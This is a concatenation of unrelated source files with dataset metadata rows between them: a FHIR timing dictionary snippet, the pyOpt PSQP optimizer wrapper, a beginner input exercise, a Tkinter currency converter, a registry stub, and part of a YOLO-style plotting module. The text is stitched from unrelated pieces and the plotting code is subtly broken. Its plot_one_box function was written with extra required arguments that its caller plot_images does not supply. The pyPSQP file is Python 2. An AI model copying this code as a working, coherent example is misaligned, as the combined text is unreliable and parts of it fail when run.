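# TypedDict is declared with total=False, every key is optional, so a timing of
# "3 times per day for 10 days" can be expressed with just a few fields.
example_repeat: FHIR_Timing_Repeat = {
    "frequency": 3,     # three repetitions ...
    "period": 1,        # ... per one period
    "periodUnit": "d",  # the period unit is days (UCUM)
    "count": 30,        # 3 per day for 10 days = 30 repetitions in total
}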
| 61.271186
| 836
| 0.670954
|
be16099c5e79082522272f3940e0a030a8e3765a
| 16,666
|
py
|
Python
|
docker/optimization/pyOpt/tags/v1.2.0/pyOpt/pyPSQP/pyPSQP.py
|
liujiamingustc/phd
|
4f815a738abad43531d02ac66f5bd0d9a1def52a
|
[
"Apache-2.0"
] | 3
|
2021-01-06T03:01:18.000Z
|
2022-03-21T03:02:55.000Z
|
docker/optimization/pyOpt/tags/v1.2.0/pyOpt/pyPSQP/pyPSQP.py
|
liujiamingustc/phd
|
4f815a738abad43531d02ac66f5bd0d9a1def52a
|
[
"Apache-2.0"
] | null | null | null |
docker/optimization/pyOpt/tags/v1.2.0/pyOpt/pyPSQP/pyPSQP.py
|
liujiamingustc/phd
|
4f815a738abad43531d02ac66f5bd0d9a1def52a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
'''
pyPSQP - A Python pyOpt interface to PSQP.
Copyright (c) 2008-2014 by pyOpt Developers
All rights reserved.
Revision: 1.1 $Date: 31/07/2014 21:00$
Tested on:
---------
Win32 with g77
Linux with pathf95
Linux with gfortran
Linux with g77
Developers:
-----------
- Dr. Ruben E. Perez (RP)
History
-------
v. 1.0 - Initial Class Creation (RP, 2010)
v. 1.1 - Unconstrained Problems Support (RP, 2014)
'''
__version__ = '$Revision: $'
'''
To Do:
-
'''
# =============================================================================
# PSQP Library
# =============================================================================
try:
import psqp
except:
raise ImportError('PSQP shared library failed to import')
#end
# =============================================================================
# Standard Python modules
# =============================================================================
import os, sys
import copy, time
# =============================================================================
# External Python modules
# =============================================================================
import numpy
# =============================================================================
# Extension modules
# =============================================================================
from pyOpt import Optimizer
from pyOpt import Gradient
# =============================================================================
# Misc Definitions
# =============================================================================
inf = 10.E+20 # define a value for infinity
# =============================================================================
eps = 1.0 # define a value for machine precision
while ((eps/2.0 + 1.0) > 1.0):
eps = eps/2.0
#end
eps = 2.0*eps
#eps = math.ldexp(1,-52)
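# Note: the loop above computes double-precision machine epsilon
# (approximately 2.22e-16), i.e. the same value as math.ldexp(1, -52)
# for IEEE-754 doubles.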
# =============================================================================
# PSQP Optimizer Class
# =============================================================================
class PSQP(Optimizer):
'''
PSQP Optimizer Class - Inherited from Optimizer Abstract Class
'''
def __init__(self, pll_type=None, *args, **kwargs):
'''
PSQP Optimizer Class Initialization
**Keyword arguments:**
- pll_type -> STR: Parallel Implementation (None, 'POA'-Parallel Objective Analysis), *Default* = None
Documentation last updated: Feb. 16, 2010 - Peter W. Jansen
'''
#
if (pll_type == None):
self.poa = False
elif (pll_type.upper() == 'POA'):
self.poa = True
else:
raise ValueError("pll_type must be either None or 'POA'")
#end
#
name = 'PSQP'
category = 'Local Optimizer'
def_opts = {
'XMAX':[float,1e16], # Maximum Stepsize
'TOLX':[float,1e-16], # Variable Change Tolerance
'TOLC':[float,1e-6], # Constraint Violation Tolerance
'TOLG':[float,1e-6], # Lagrangian Gradient Tolerance
'RPF':[float,1e-4], # Penalty Coefficient
'MIT':[int,1000], # Maximum Number of Iterations
'MFV':[int,2000], # Maximum Number of Function Evaluations
'MET':[int,2], # Variable Metric Update (1 - BFGS, 2 - Hoshino)
'MEC':[int,2], # Negative Curvature Correction (1 - None, 2 - Powell's Correction)
'IPRINT':[int,2], # Output Level (0 - None, 1 - Final, 2 - Iter)
'IOUT':[int,6], # Output Unit Number
'IFILE':[str,'PSQP.out'], # Output File Name
}
informs = {
1 : 'Change in design variable was less than or equal to tolerance',
2 : 'Change in objective function was less than or equal to tolerance',
3 : 'Objective function less than or equal to tolerance',
4 : 'Maximum constraint value is less than or equal to tolerance',
11 : 'Maximum number of iterations exceeded',
12 : 'Maximum number of function evaluations exceeded',
13 : 'Maximum number of gradient evaluations exceeded',
-6 : 'Termination criterion not satisfied, but obtained point is acceptable',
#<0 : 'Method failed',
}
Optimizer.__init__(self, name, category, def_opts, informs, *args, **kwargs)
def __solve__(self, opt_problem={}, sens_type='FD', store_sol=True, store_hst=False, hot_start=False, disp_opts=False, sens_mode='', sens_step={}, *args, **kwargs):
'''
Run Optimizer (Optimize Routine)
**Keyword arguments:**
- opt_problem -> INST: Optimization instance
- sens_type -> STR/FUNC: Gradient type, *Default* = 'FD'
- store_sol -> BOOL: Store solution in Optimization class flag, *Default* = True
- disp_opts -> BOOL: Flag to display options in solution text, *Default* = False
- store_hst -> BOOL/STR: Flag/filename to store optimization history, *Default* = False
- hot_start -> BOOL/STR: Flag/filename to read optimization history, *Default* = False
- sens_mode -> STR: Flag for parallel gradient calculation, *Default* = ''
        - sens_step -> FLOAT: Sensitivity step size, *Default* = {} [corresponds to 1e-6 (FD), 1e-20(CS)]
Additional arguments and keyword arguments are passed to the objective function call.
Documentation last updated: February. 2, 2011 - Ruben E. Perez
'''
#
if ((self.poa) and (sens_mode.lower() == 'pgc')):
raise NotImplementedError("pyPSQP - Current implementation only allows single level parallelization, either 'POA' or 'pgc'")
#end
if self.poa or (sens_mode.lower() == 'pgc'):
try:
import mpi4py
from mpi4py import MPI
except ImportError:
print 'pyPSQP: Parallel objective Function Analysis requires mpi4py'
#end
comm = MPI.COMM_WORLD
nproc = comm.Get_size()
if (mpi4py.__version__[0] == '0'):
Bcast = comm.Bcast
elif (mpi4py.__version__[0] == '1'):
Bcast = comm.bcast
#end
self.pll = True
self.myrank = comm.Get_rank()
else:
self.pll = False
self.myrank = 0
#end
myrank = self.myrank
#
def_fname = self.options['IFILE'][1].split('.')[0]
hos_file, log_file, tmp_file = self._setHistory(opt_problem.name, store_hst, hot_start, def_fname)
#
gradient = Gradient(opt_problem, sens_type, sens_mode, sens_step, *args, **kwargs)
#======================================================================
# PSQP - Objective/Constraint Values Storage
#======================================================================
def eval(x):
# Variables Groups Handling
if opt_problem.use_groups:
xg = {}
for group in group_ids.keys():
if (group_ids[group][1]-group_ids[group][0] == 1):
xg[group] = x[group_ids[group][0]]
else:
xg[group] = x[group_ids[group][0]:group_ids[group][1]]
#end
#end
xn = xg
else:
xn = x
#end
# Flush Output Files
self.flushFiles()
# Evaluate User Function (Real Valued)
fail = 0
f = []
g = []
if (myrank == 0):
if self.h_start:
[vals,hist_end] = hos_file.read(ident=['obj', 'con', 'fail'])
if hist_end:
self.h_start = False
hos_file.close()
else:
[f,g,fail] = [vals['obj'][0][0],vals['con'][0],int(vals['fail'][0][0])]
#end
#end
#end
if self.pll:
self.h_start = Bcast(self.h_start,root=0)
#end
if self.h_start and self.pll:
[f,g,fail] = Bcast([f,g,fail],root=0)
elif not self.h_start:
[f,g,fail] = opt_problem.obj_fun(xn, *args, **kwargs)
#end
# Store History
if (myrank == 0):
if self.sto_hst:
log_file.write(x,'x')
log_file.write(f,'obj')
log_file.write(g,'con')
log_file.write(fail,'fail')
#end
#end
            # Objective Assignment
if isinstance(f,float):
f = [f]
#end
for i in xrange(len(opt_problem._objectives.keys())):
if isinstance(f[i],complex):
ff[i] = f[i].astype(float)
else:
ff[i] = f[i]
#end
#end
            # Constraints Assignment
i = 0
for j in xrange(len(opt_problem._constraints.keys())):
if isinstance(g[j],complex):
gg[i] = g[j].astype(float)
else:
gg[i] = g[j]
#end
i += 1
#end
# Gradients
if self.h_start:
dff = []
dgg = []
if (myrank == 0):
[vals,hist_end] = hos_file.read(ident=['grad_obj','grad_con'])
if hist_end:
self.h_start = False
hos_file.close()
else:
dff = vals['grad_obj'][0].reshape((len(opt_problem._objectives.keys()),len(opt_problem._variables.keys())))
dgg = vals['grad_con'][0].reshape((len(opt_problem._constraints.keys()),len(opt_problem._variables.keys())))
#end
#end
if self.pll:
self.h_start = Bcast(self.h_start,root=0)
#end
if self.h_start and self.pll:
[dff,dgg] = Bcast([dff,dgg],root=0)
#end
#end
if not self.h_start:
#
dff,dgg = gradient.getGrad(x, group_ids, f, g, *args, **kwargs)
#end
# Store History
if self.sto_hst and (myrank == 0):
log_file.write(dff,'grad_obj')
log_file.write(dgg,'grad_con')
#end
# Store
self.stored_data['x'] = copy.copy(x)
self.stored_data['f'] = copy.copy(ff)
self.stored_data['g'] = copy.copy(gg)
self.stored_data['df'] = copy.copy(dff)
self.stored_data['dg'] = copy.copy(dgg)
return
#======================================================================
# PSQP - Objective Values Function
#======================================================================
def pobj(n,x,f):
if ((self.stored_data['x'] != x).any()):
eval(x)
#end
ff = self.stored_data['f']
return ff[0]
#======================================================================
# PSQP - Constraint Values Function
#======================================================================
def pcon(n,k,x,g):
if ((self.stored_data['x'] != x).any()):
eval(x)
#end
gg = self.stored_data['g']
return gg[k-1]
#======================================================================
# PSQP - Objective Gradients Function
#======================================================================
def pdobj(n,x,df):
if ((self.stored_data['x'] != x).any()):
eval(x)
#end
df = self.stored_data['df']
return df[0]
#======================================================================
# PSQP - Constraint Gradients Function
#======================================================================
def pdcon(n,k,x,dg):
if ((self.stored_data['x'] != x).any()):
eval(x)
#end
dg = self.stored_data['dg']
return dg[k-1]
# Variables Handling
nvar = len(opt_problem._variables.keys())
xl = []
xu = []
xi = []
xx = []
for key in opt_problem._variables.keys():
xl.append(opt_problem._variables[key].lower)
xu.append(opt_problem._variables[key].upper)
xi.append(3)
xx.append(opt_problem._variables[key].value)
#end
xl = numpy.array(xl)
xu = numpy.array(xu)
xi = numpy.array(xi)
xx = numpy.array(xx)
# Variables Groups Handling
group_ids = {}
if opt_problem.use_groups:
k = 0
for key in opt_problem._vargroups.keys():
group_len = len(opt_problem._vargroups[key]['ids'])
group_ids[opt_problem._vargroups[key]['name']] = [k,k+group_len]
k += group_len
#end
#end
# Constraints Handling
ncon = len(opt_problem._constraints.keys())
if ncon > 0:
gi = []
gg = []
for key in opt_problem._constraints.keys():
if opt_problem._constraints[key].type == 'e':
gi.append(5)
elif opt_problem._constraints[key].type == 'i':
gi.append(2)
#end
gg.append(opt_problem._constraints[key].value)
#end
gg.append(0.0)
gl = numpy.zeros([ncon], numpy.float)
gu = numpy.zeros([ncon], numpy.float)
gi = numpy.array(gi, numpy.float)
gg = numpy.array(gg, numpy.float)
else:
gl = numpy.array([0], numpy.float)
gu = numpy.array([0], numpy.float)
gi = numpy.array([0], numpy.float)
gg = numpy.array([0], numpy.float)
#end
# Objective Handling
objfunc = opt_problem.obj_fun
nobj = len(opt_problem._objectives.keys())
ff = []
for key in opt_problem._objectives.keys():
ff.append(opt_problem._objectives[key].value)
#end
ff = numpy.array(ff, numpy.float)
# Setup argument list values
nf = numpy.array([nvar], numpy.int)
nc = numpy.array([ncon], numpy.int)
mit = numpy.array([self.options['MIT'][1]], numpy.int)
mfv = numpy.array([self.options['MFV'][1]], numpy.int)
met = numpy.array([self.options['MET'][1]], numpy.int)
mec = numpy.array([self.options['MEC'][1]], numpy.int)
xmax = numpy.array([self.options['XMAX'][1]], numpy.float)
tolx = numpy.array([self.options['TOLX'][1]], numpy.float)
tolc = numpy.array([self.options['TOLC'][1]], numpy.float)
tolg = numpy.array([self.options['TOLG'][1]], numpy.float)
rpf = numpy.array([self.options['RPF'][1]], numpy.float)
gmax = numpy.array([0], numpy.float)
cmax = numpy.array([0], numpy.float)
if (myrank == 0):
if (self.options['IPRINT'][1] <= 2):
iprint = numpy.array([self.options['IPRINT'][1]], numpy.int)
else:
raise IOError('Incorrect Output Level Setting')
#end
else:
iprint = numpy.array([0], numpy.int)
#end
iout = numpy.array([self.options['IOUT'][1]], numpy.int)
ifile = self.options['IFILE'][1]
if (myrank == 0):
if (iprint != 0):
if os.path.isfile(ifile):
os.remove(ifile)
#end
#end
#end
iterm = numpy.array([0], numpy.int)
# Storage Arrays
self.stored_data = {}
self.stored_data['x'] = {} #numpy.zeros([nvar],float)
self.stored_data['f'] = {} #numpy.zeros([nobj],float)
self.stored_data['g'] = {} #numpy.zeros([ncon],float)
self.stored_data['df'] = {} #numpy.zeros([nvar],float)
self.stored_data['dg'] = {} #numpy.zeros([ncon,nvar],float)
# Run PSQP
t0 = time.time()
psqp.psqp_wrap(nf,nc,xx,xi,xl,xu,gg,gi,gl,gu,mit,mfv,
met,mec,xmax,tolx,tolc,tolg,rpf,ff,gmax,cmax,
iprint,iout,ifile,iterm,pobj,pdobj,pcon,pdcon)
sol_time = time.time() - t0
if (myrank == 0):
if self.sto_hst:
log_file.close()
if tmp_file:
hos_file.close()
name = hos_file.filename
os.remove(name+'.cue')
os.remove(name+'.bin')
os.rename(name+'_tmp.cue',name+'.cue')
os.rename(name+'_tmp.bin',name+'.bin')
#end
#end
#end
# Store Results
sol_inform = {}
sol_inform['value'] = iterm[0]
sol_inform['text'] = self.getInform(iterm[0])
if store_sol:
sol_name = 'PSQP Solution to ' + opt_problem.name
sol_options = copy.copy(self.options)
if sol_options.has_key('defaults'):
del sol_options['defaults']
#end
sol_evals = psqp.stat.nfv + psqp.stat.nfg*nvar
sol_vars = copy.deepcopy(opt_problem._variables)
i = 0
for key in sol_vars.keys():
sol_vars[key].value = xx[i]
i += 1
#end
sol_objs = copy.deepcopy(opt_problem._objectives)
i = 0
for key in sol_objs.keys():
sol_objs[key].value = ff[i]
i += 1
#end
if ncon > 0:
sol_cons = copy.deepcopy(opt_problem._constraints)
i = 0
for key in sol_cons.keys():
sol_cons[key].value = gg[i]
i += 1
#end
else:
sol_cons = {}
#end
sol_lambda = {}
opt_problem.addSol(self.__class__.__name__, sol_name, objfunc, sol_time,
sol_evals, sol_inform, sol_vars, sol_objs, sol_cons, sol_options,
display_opts=disp_opts, Lambda=sol_lambda, Sensitivities=sens_type,
myrank=myrank, arguments=args, **kwargs)
#end
return ff, xx, sol_inform
def _on_setOption(self, name, value):
'''
Set Optimizer Option Value (Optimizer Specific Routine)
Documentation last updated: November. 30, 2010 - Ruben E. Perez
'''
pass
def _on_getOption(self, name):
'''
Get Optimizer Option Value (Optimizer Specific Routine)
Documentation last updated: November. 30, 2010 - Ruben E. Perez
'''
pass
def _on_getInform(self, infocode):
'''
Get Optimizer Result Information (Optimizer Specific Routine)
Keyword arguments:
-----------------
id -> STRING: Option Name
Documentation last updated: November. 30, 2010 - Ruben E. Perez
'''
return self.informs[infocode]
def _on_flushFiles(self):
'''
Flush the Output Files (Optimizer Specific Routine)
Documentation last updated: November. 30, 2010 - Ruben E. Perez
'''
#
iprint = self.options['IPRINT'][1]
if (iprint > 0):
psqp.pyflush(self.options['IOUT'][1])
#end
#==============================================================================
# PSQP Optimizer Test
#==============================================================================
if __name__ == '__main__':
# Test PSQP
print 'Testing ...'
psqp = PSQP()
print psqp
| 26.837359
| 165
| 0.552742
|
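A minimal usage sketch for the PSQP wrapper above, assuming the standard pyOpt problem-definition API (Optimization, addVar, addObj, addCon) and the same Python 2 idiom the module itself uses; the objective, bounds and constraint here are invented for illustration and are not taken from the source.
from pyOpt import Optimization, PSQP

def objfunc(x):
    # hypothetical objective with one inequality constraint g[0] <= 0
    f = (x[0] - 3.0)**2 + (x[1] + 1.0)**2
    g = [x[0] + x[1] - 4.0]
    fail = 0
    return f, g, fail

opt_prob = Optimization('PSQP usage sketch', objfunc)
opt_prob.addVar('x1', 'c', lower=-10.0, upper=10.0, value=0.0)
opt_prob.addVar('x2', 'c', lower=-10.0, upper=10.0, value=0.0)
opt_prob.addObj('f')
opt_prob.addCon('g1', 'i')

psqp = PSQP()
psqp.setOption('IPRINT', 0)     # keep the Fortran-side output quiet
psqp(opt_prob, sens_type='FD')  # finite-difference gradients, the wrapper's default
print opt_prob.solution(0)      # Python 2 print, matching the module above
Because the wrapper caches objective, constraint and gradient values between the PSQP callbacks, a single obj_fun returning (f, g, fail) is all the problem definition needs.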
dd99016ceb11b93851eaa940b462910c5f9ab5eb
| 398
|
py
|
Python
|
exercs/ex104.py
|
gugamacedo/logica-e-algoritmos
|
787e771cf9ecebe876ac895fd0b544476d8e3b15
|
[
"MIT"
] | null | null | null |
exercs/ex104.py
|
gugamacedo/logica-e-algoritmos
|
787e771cf9ecebe876ac895fd0b544476d8e3b15
|
[
"MIT"
] | null | null | null |
exercs/ex104.py
|
gugamacedo/logica-e-algoritmos
|
787e771cf9ecebe876ac895fd0b544476d8e3b15
|
[
"MIT"
] | null | null | null |
# write the leia_int() function, which works like input() but only accepts int values
def leia_int(texto):
while True:
num = str(input((texto))).replace(' ', '')
if num.isnumeric():
num = int(num)
return num
else:
print('\033[31mErro!\033[m')
num = leia_int('Digite um número inteiro: ')
print(f'O número inserido foi {num}')
| 28.428571
| 79
| 0.557789
|
99474f4fc8fc3df199b558b4045309b09c684b8a
| 1,587
|
py
|
Python
|
Python/currency_convertor.py
|
TheDesTrucToRR/Hacktoberfest-2021
|
2757383c7432909dfbdbda61fb9ca9f6de495cfe
|
[
"MIT"
] | 14
|
2021-10-01T16:53:27.000Z
|
2021-10-17T13:15:44.000Z
|
Python/currency_convertor.py
|
TheDesTrucToRR/Hacktoberfest-2021
|
2757383c7432909dfbdbda61fb9ca9f6de495cfe
|
[
"MIT"
] | 37
|
2021-10-01T17:14:52.000Z
|
2021-10-21T17:26:14.000Z
|
Python/currency_convertor.py
|
TheDesTrucToRR/Hacktoberfest-2021
|
2757383c7432909dfbdbda61fb9ca9f6de495cfe
|
[
"MIT"
] | 38
|
2021-10-01T16:59:16.000Z
|
2021-10-30T16:05:31.000Z
|
#Currency Convertor
import tkinter as tk
import tkinter.ttk as ttk
from forex_python.converter import CurrencyRates
def convertcurr(rate):
x = amount.get()
y = currency_from.get()
z = currency_to.get()
curr = CurrencyRates()
f = curr.convert(y,z,x)
final.set(format(f, '.2f'))
root = tk.Tk()
root.geometry('450x400')
root.title('Currency Converter')
amount = tk.IntVar()
currency_from = tk.StringVar()
currency_to = tk.StringVar()
final = tk.StringVar()
tk.Label(root, text='Input amount',font='Times').grid(row=0, column=0, columnspan=5,sticky='NSEW')
q = ttk.Entry(root, textvariable=amount)
q.grid(row=1, column=1, columnspan=3, sticky='NSWE', padx=5, pady=5)
tk.Label(root, text='Input Convert From (USD,INR,EUR,GBP etc)',font='Times').grid(row=2, column=0, columnspan=5,sticky='NSEW')
q = ttk.Entry(root, textvariable=currency_from)
q.grid(row=3, column=1, columnspan=3, sticky='NSWE', padx=5, pady=5)
tk.Label(root, text='Input Convert To (USD,INR,EUR,GBP etc)',font='Times').grid(row=4, column=0, columnspan=5,sticky='NSEW')
q = ttk.Entry(root, textvariable=currency_to)
q.grid(row=5, column=1, columnspan=3, sticky='NSWE', padx=5, pady=5)
w = ttk.Button(root, text='Convert', command=lambda r=1.08: convertcurr(r))
w.grid(row=7, column=2, padx=5, pady=5,sticky='NSWE')
tk.Label(root).grid(row=9, column=0, columnspan=5)
tk.Label(root, text='--Converted Amount--',font='Times').grid(row=10, column=1, columnspan=3, sticky='NSWE')
l = ttk.Label(root, textvariable=final, relief='groove')
l.grid(row=11, column=1, columnspan=3, sticky='NSWE')
root.mainloop()
| 30.519231
| 126
| 0.711405
|
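The Tkinter script above delegates the actual conversion to forex_python's CurrencyRates.convert; a minimal non-GUI sketch of the same call, assuming live access to the exchange-rate service (the currency codes and amount are examples).
from forex_python.converter import CurrencyRates

rates = CurrencyRates()
converted = rates.convert('USD', 'INR', 100)  # from-currency, to-currency, amount
print(format(converted, '.2f'))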
f3d170a2d7826234f4cbefd70f6ffe1a7fc6b8de
| 60
|
py
|
Python
|
retina/model/necks/registry.py
|
mike112223/retina
|
cdad3af8240471619f42e9edd1caf68a0241bea6
|
[
"Apache-2.0"
] | null | null | null |
retina/model/necks/registry.py
|
mike112223/retina
|
cdad3af8240471619f42e9edd1caf68a0241bea6
|
[
"Apache-2.0"
] | null | null | null |
retina/model/necks/registry.py
|
mike112223/retina
|
cdad3af8240471619f42e9edd1caf68a0241bea6
|
[
"Apache-2.0"
] | null | null | null |
from retina.utils import Registry
NECKS = Registry('neck')
| 15
| 33
| 0.766667
|
9310d46be375f9502ecca0a5ef5a1da251fad6bc
| 19,078
|
py
|
Python
|
utils/plots.py
|
heieureka/emotic
|
93cd79e30e03c3fd3a4a478dcf645db569fe2a1b
|
[
"MIT"
] | 8
|
2022-01-11T14:35:38.000Z
|
2022-03-31T09:47:26.000Z
|
utils/plots.py
|
heieureka/emotic
|
93cd79e30e03c3fd3a4a478dcf645db569fe2a1b
|
[
"MIT"
] | null | null | null |
utils/plots.py
|
heieureka/emotic
|
93cd79e30e03c3fd3a4a478dcf645db569fe2a1b
|
[
"MIT"
] | 4
|
2022-01-17T00:51:38.000Z
|
2022-03-30T16:12:28.000Z
|
# Plotting utils
import glob
import math
import os
import random
from copy import copy
from pathlib import Path
import cv2
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import torch
import yaml
from PIL import Image, ImageDraw, ImageFont
from utils.general import xywh2xyxy, xyxy2xywh
from utils.metrics import fitness
# Settings
matplotlib.rc('font', **{'size': 11})
matplotlib.use('Agg') # for writing to files only
class Colors:
# Ultralytics color palette https://ultralytics.com/
def __init__(self):
# hex = matplotlib.colors.TABLEAU_COLORS.values()
hex = ('FF3838', 'FF9D97', 'FF701F', 'FFB21D', 'CFD231', '48F90A', '92CC17', '3DDB86', '1A9334', '00D4BB',
'2C99A8', '00C2FF', '344593', '6473FF', '0018EC', '8438FF', '520085', 'CB38FF', 'FF95C8', 'FF37C7')
self.palette = [self.hex2rgb('#' + c) for c in hex]
self.n = len(self.palette)
def __call__(self, i, bgr=False):
c = self.palette[int(i) % self.n]
return (c[2], c[1], c[0]) if bgr else c
@staticmethod
def hex2rgb(h): # rgb order (PIL)
return tuple(int(h[1 + i:1 + i + 2], 16) for i in (0, 2, 4))
colors = Colors() # create instance for 'from utils.plots import colors'
def hist2d(x, y, n=100):
# 2d histogram used in labels.png and evolve.png
xedges, yedges = np.linspace(x.min(), x.max(), n), np.linspace(y.min(), y.max(), n)
hist, xedges, yedges = np.histogram2d(x, y, (xedges, yedges))
xidx = np.clip(np.digitize(x, xedges) - 1, 0, hist.shape[0] - 1)
yidx = np.clip(np.digitize(y, yedges) - 1, 0, hist.shape[1] - 1)
return np.log(hist[xidx, yidx])
def butter_lowpass_filtfilt(data, cutoff=1500, fs=50000, order=5):
from scipy.signal import butter, filtfilt
# https://stackoverflow.com/questions/28536191/how-to-filter-smooth-with-scipy-numpy
def butter_lowpass(cutoff, fs, order):
nyq = 0.5 * fs
normal_cutoff = cutoff / nyq
return butter(order, normal_cutoff, btype='low', analog=False)
b, a = butter_lowpass(cutoff, fs, order=order)
return filtfilt(b, a, data) # forward-backward filter
def plot_one_box(x, im, pred_cat=(), pred_cont=None, color=(128, 128, 128), label=None, line_thickness=3):  # pred_cat/pred_cont default to empty so label-only callers (e.g. plot_images) still work
# Plots one bounding box on image 'im' using OpenCV
assert im.data.contiguous, 'Image not contiguous. Apply np.ascontiguousarray(im) to plot_on_box() input image.'
tl = line_thickness or round(0.002 * (im.shape[0] + im.shape[1]) / 2) + 1 # line/font thickness
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(im, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(im, c1, c2, color, -1, cv2.LINE_AA) # filled
#cv2.putText(im, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
for id, text in enumerate(pred_cat):
cv2.putText(im, text, (c1[0], c1[1] + id*20), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
def plot_one_box_PIL(box, im, color=(128, 128, 128), label=None, line_thickness=None):
# Plots one bounding box on image 'im' using PIL
im = Image.fromarray(im)
draw = ImageDraw.Draw(im)
line_thickness = line_thickness or max(int(min(im.size) / 200), 2)
draw.rectangle(box, width=line_thickness, outline=color) # plot
if label:
font = ImageFont.truetype("Arial.ttf", size=max(round(max(im.size) / 40), 12))
txt_width, txt_height = font.getsize(label)
draw.rectangle([box[0], box[1] - txt_height + 4, box[0] + txt_width, box[1]], fill=color)
draw.text((box[0], box[1] - txt_height + 1), label, fill=(255, 255, 255), font=font)
return np.asarray(im)
def plot_wh_methods(): # from utils.plots import *; plot_wh_methods()
# Compares the two methods for width-height anchor multiplication
# https://github.com/ultralytics/yolov3/issues/168
x = np.arange(-4.0, 4.0, .1)
ya = np.exp(x)
yb = torch.sigmoid(torch.from_numpy(x)).numpy() * 2
fig = plt.figure(figsize=(6, 3), tight_layout=True)
plt.plot(x, ya, '.-', label='YOLOv3')
plt.plot(x, yb ** 2, '.-', label='YOLOv5 ^2')
plt.plot(x, yb ** 1.6, '.-', label='YOLOv5 ^1.6')
plt.xlim(left=-4, right=4)
plt.ylim(bottom=0, top=6)
plt.xlabel('input')
plt.ylabel('output')
plt.grid()
plt.legend()
fig.savefig('comparison.png', dpi=200)
def output_to_target(output):
# Convert model output to target format [batch_id, class_id, x, y, w, h, conf]
targets = []
for i, o in enumerate(output):
for *box, conf, cls in o.cpu().numpy():
targets.append([i, cls, *list(*xyxy2xywh(np.array(box)[None])), conf])
return np.array(targets)
def plot_images(images, targets, paths=None, fname='images.jpg', names=None, max_size=640, max_subplots=16):
# Plot image grid with labels
if isinstance(images, torch.Tensor):
images = images.cpu().float().numpy()
if isinstance(targets, torch.Tensor):
targets = targets.cpu().numpy()
# un-normalise
if np.max(images[0]) <= 1:
images *= 255
tl = 3 # line thickness
tf = max(tl - 1, 1) # font thickness
bs, _, h, w = images.shape # batch size, _, height, width
bs = min(bs, max_subplots) # limit plot images
ns = np.ceil(bs ** 0.5) # number of subplots (square)
# Check if we should resize
scale_factor = max_size / max(h, w)
if scale_factor < 1:
h = math.ceil(scale_factor * h)
w = math.ceil(scale_factor * w)
mosaic = np.full((int(ns * h), int(ns * w), 3), 255, dtype=np.uint8) # init
for i, img in enumerate(images):
if i == max_subplots: # if last batch has fewer images than we expect
break
block_x = int(w * (i // ns))
block_y = int(h * (i % ns))
img = img.transpose(1, 2, 0)
if scale_factor < 1:
img = cv2.resize(img, (w, h))
mosaic[block_y:block_y + h, block_x:block_x + w, :] = img
if len(targets) > 0:
image_targets = targets[targets[:, 0] == i]
boxes = xywh2xyxy(image_targets[:, 2:6]).T
classes = image_targets[:, 1].astype('int')
labels = image_targets.shape[1] == 6 # labels if no conf column
conf = None if labels else image_targets[:, 6] # check for confidence presence (label vs pred)
if boxes.shape[1]:
if boxes.max() <= 1.01: # if normalized with tolerance 0.01
boxes[[0, 2]] *= w # scale to pixels
boxes[[1, 3]] *= h
elif scale_factor < 1: # absolute coords need scale if image scales
boxes *= scale_factor
boxes[[0, 2]] += block_x
boxes[[1, 3]] += block_y
for j, box in enumerate(boxes.T):
cls = int(classes[j])
color = colors(cls)
cls = names[cls] if names else cls
if labels or conf[j] > 0.25: # 0.25 conf thresh
label = '%s' % cls if labels else '%s %.1f' % (cls, conf[j])
plot_one_box(box, mosaic, label=label, color=color, line_thickness=tl)
# Draw image filename labels
if paths:
label = Path(paths[i]).name[:40] # trim to 40 char
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
cv2.putText(mosaic, label, (block_x + 5, block_y + t_size[1] + 5), 0, tl / 3, [220, 220, 220], thickness=tf,
lineType=cv2.LINE_AA)
# Image border
cv2.rectangle(mosaic, (block_x, block_y), (block_x + w, block_y + h), (255, 255, 255), thickness=3)
if fname:
r = min(1280. / max(h, w) / ns, 1.0) # ratio to limit image size
mosaic = cv2.resize(mosaic, (int(ns * w * r), int(ns * h * r)), interpolation=cv2.INTER_AREA)
# cv2.imwrite(fname, cv2.cvtColor(mosaic, cv2.COLOR_BGR2RGB)) # cv2 save
Image.fromarray(mosaic).save(fname) # PIL save
return mosaic
def plot_lr_scheduler(optimizer, scheduler, epochs=300, save_dir=''):
# Plot LR simulating training for full epochs
optimizer, scheduler = copy(optimizer), copy(scheduler) # do not modify originals
y = []
for _ in range(epochs):
scheduler.step()
y.append(optimizer.param_groups[0]['lr'])
plt.plot(y, '.-', label='LR')
plt.xlabel('epoch')
plt.ylabel('LR')
plt.grid()
plt.xlim(0, epochs)
plt.ylim(0)
plt.savefig(Path(save_dir) / 'LR.png', dpi=200)
plt.close()
def plot_test_txt(): # from utils.plots import *; plot_test()
# Plot test.txt histograms
x = np.loadtxt('test.txt', dtype=np.float32)
box = xyxy2xywh(x[:, :4])
cx, cy = box[:, 0], box[:, 1]
fig, ax = plt.subplots(1, 1, figsize=(6, 6), tight_layout=True)
ax.hist2d(cx, cy, bins=600, cmax=10, cmin=0)
ax.set_aspect('equal')
plt.savefig('hist2d.png', dpi=300)
fig, ax = plt.subplots(1, 2, figsize=(12, 6), tight_layout=True)
ax[0].hist(cx, bins=600)
ax[1].hist(cy, bins=600)
plt.savefig('hist1d.png', dpi=200)
def plot_targets_txt(): # from utils.plots import *; plot_targets_txt()
# Plot targets.txt histograms
x = np.loadtxt('targets.txt', dtype=np.float32).T
s = ['x targets', 'y targets', 'width targets', 'height targets']
fig, ax = plt.subplots(2, 2, figsize=(8, 8), tight_layout=True)
ax = ax.ravel()
for i in range(4):
ax[i].hist(x[i], bins=100, label='%.3g +/- %.3g' % (x[i].mean(), x[i].std()))
ax[i].legend()
ax[i].set_title(s[i])
plt.savefig('targets.jpg', dpi=200)
def plot_study_txt(path='', x=None): # from utils.plots import *; plot_study_txt()
# Plot study.txt generated by test.py
fig, ax = plt.subplots(2, 4, figsize=(10, 6), tight_layout=True)
# ax = ax.ravel()
